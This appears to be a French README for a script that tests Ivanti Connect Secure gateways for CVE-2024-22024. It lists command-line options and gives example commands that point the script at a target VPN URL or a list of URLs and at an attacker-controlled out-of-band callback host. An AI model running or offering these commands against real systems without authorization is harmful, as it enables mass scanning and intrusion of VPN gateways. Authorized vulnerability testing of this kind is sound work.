
Vérifier la vulnérabilité CVE-2024-22024 dans Ivanti Connect Secure
Vérification de la vulnérabilité CVE-2024-22024 dans Ivanti Connect Secure
[!WARNING] À DES FINS ÉDUCATIVES ET DE TEST AUTORISÉ UNIQUEMENT.
-u ou --target_url : L'URL cible Ivanti Connect Secure (ICS) ou un fichier contenant une liste d'URL.-c ou --attacker_url : L'URL de l'attaquant (générez-en une en utilisant Burp Collaborator, ngrok, ou une URL unique depuis Webhook.site)-t ou --timeout : Délai d'attente en secondes pour la requête (par défaut : 3 secondes)Test d'une URL unique :
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
Test d'une liste d'URL :
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
Utilisation d'un délai d'attente différent (5 secondes) :
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
Quiconque a découvert la vulnérabilité... J'ai juste lu le PoC et automatisé ceci.